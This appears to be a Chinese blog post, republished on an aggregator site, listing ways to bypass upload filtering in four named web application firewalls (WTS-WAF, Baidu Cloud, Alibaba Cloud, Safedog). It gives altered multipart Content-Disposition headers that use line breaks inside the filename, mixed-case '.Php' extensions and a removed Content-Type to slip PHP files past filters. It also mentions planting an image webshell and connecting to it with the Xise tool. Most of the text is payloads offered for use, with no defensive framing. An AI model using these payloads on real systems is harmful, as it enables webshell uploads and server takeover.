上传绕过WAF几种常见的姿势 - 走看看

zoukankan html css js c++ java

上传绕过WAF几种常见的姿势

1：WTS-WAF 绕过上传
原内容：
Content-Disposition: form-data; name="up_picture"; filename="xss.php"
添加回车
Content-Disposition: form-data; name="up_picture"; filename="xss.ph
p"

2：百度云上传绕过见下：
百度云绕过就简单的很多很多，在对文件名大小写上面没有检测php是过了的，Php就能过，或者PHP，一句话自己合成图片马用Xise连接即可。
Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"
3：阿里云上传绕过见下：
源代码：
Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg
修改如下：
Content-Disposition: form-data; name="img_crop_file"; filename="1.php"
没错，将=号这里回车删除掉Content-Type: image/jpeg即可绕过。
4：安全狗上传绕过见下：
源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下：
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
删除掉ontent-Type: image/jpeg只留下c，将.php加c后面即可，但是要注意额，双引号要跟着c.php".

查看全文

相关阅读:
计算机的组成与操作系统
 面向对象初识
 规范化目录
 装饰器进阶
 装饰器练习
 装饰器
 内置函数二闭包
 生成器推导式练习
 迭代器递归格式化练习
 生成器推导式内置函数

原文地址：https://www.cnblogs.com/xishaonian/p/6861441.html

Copyright © 2011-2022 走看看